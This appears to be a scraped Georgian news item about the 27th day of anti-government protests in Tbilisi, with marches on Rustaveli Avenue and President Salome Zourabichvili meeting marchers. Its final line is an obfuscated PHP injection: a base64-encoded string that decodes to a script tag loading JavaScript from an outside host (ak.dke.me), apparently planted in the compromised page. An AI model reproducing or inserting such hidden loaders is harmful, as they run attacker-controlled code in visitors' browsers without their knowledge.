tube
ავერსი jaluzi

აქციის მონაწილეებმა რუსთაველის გამზირი გადაკეტეს. პარლამენტის მიმდებარე ტერიტორიაზე შეკრებილებს ცოტა ხნის წინ “ქალების მარში” შეუერთდა.

ორბელიანების სასახლესთან მარშის მონაწილეებთან შესახვედრად საქართველოს პრეზიდენტი, სალომე ზურაბიშვილი გამოვიდა.

აქციას შეუერთდნენ კურსდამთავრებულებიც, რომლებმაც განათლება დასავლეთში მიიღეს. მოგვიანებით რუსთაველის გამზირამდე მსვლელობას გამართავს „ერთიანობის მარშიც“.

საპროტესტო აქცია 27-ე დღეა უწყვეტ რეჟიმში გრძელდება. დღის განმავლობაში თბილისის სხვადასხვა ლოკაციაზე საპროტესტო მსვლელობები იმართება, საღამოს 20:00 საათიდან კი შეკრების ადგილი პარლამენტის მიმდებარე ტერიტორიაა.

100
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");